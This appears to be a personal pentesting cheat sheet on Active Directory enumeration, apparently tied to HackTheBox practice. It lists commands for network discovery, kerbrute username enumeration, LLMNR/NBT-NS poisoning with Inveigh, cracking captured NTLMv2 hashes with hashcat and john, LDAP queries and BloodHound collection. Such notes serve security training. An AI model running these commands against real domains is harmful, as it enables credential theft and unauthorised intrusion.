rootđź’€senseicat:~#

Hack. Eat. Sleep. Repeat!!!


Project maintained by SENSEiXENUS Hosted on GitHub Pages — Theme by mattgraham

Active Directory Enum



Initial Enumeration


sudo wireshark -E enss224 -A
fping -asgq 172.16.5.0/23

image

sudo nmap -A -iL hosts.txt -oN result2

Username Enumeration[Internal AD Username enum with Kerbrute]


image

kerbrute userenum -d <DOMAIN> --dc 172.16.5.5 jsmith.txt -o valid_ad_users

image


LLMNR/NBT-NS Poisoning


hashcat -m 5600 forend_ntlmv2 /usr/share/wordlists/rockyou.txt
john --wordlist=[] hash.txt

image

image

image


Exploitng LLMNR/NBT-NS attacks with Inveigh.exe on windows


Invoke-Module .\Inveigh.ps1
Invoke-Inveigh Y -NBNS Y -ConsoleOutput Y -FileOutput Y

image

image

image

image

imageimage



ldapsearch -x -H ldap://[ip] -b 'dc=support,dc=htb' -D "support\ldap" -W 'objectClass=user'

image

ldapsearch -x -H ldap://[ip] -b 'dc=support,dc=htb' -D "support\ldap" -W 'objectClass=user'
ldapsearch -x -H ldap://support.htb -b 'dc=support,dc=htb' -D "support\ldap" -W 'objectClass=user' -y passwd
echo -n "password" > passwd
chmod 600 passwd

image

ldapsearch -x -H ldap://support.htb -b 'cn=support,cn=users,dc=support,dc=htb' -D "support\ldap" '(objectClass=user)' -y passwd

image

ldapsearch -x -H ldap://support.htb -b 'dc=support,dc=htb' -D "support\ldap" '(objectClass=group)'
ldapsearch -x -H ldap://support.htb -b 'dc=support,dc=htb' -D "support\ldap" '(objectClass=computer)' -y passwd
ldapsearch -x -H ldap://support.htb -b 'dc=support,dc=htb' -D "support\ldap" '(sAMAccountName=*)' -y passwd

Using Bloodhound-ce


pip install bloodhound-ce #community edition
pip install bloodhound #legaacy version
#same syntax tho
bloodhound-ce-python -u [user@domain] -p '[password]' -ns [nameserver / IP] -d [domain] -c [collection method]

image

image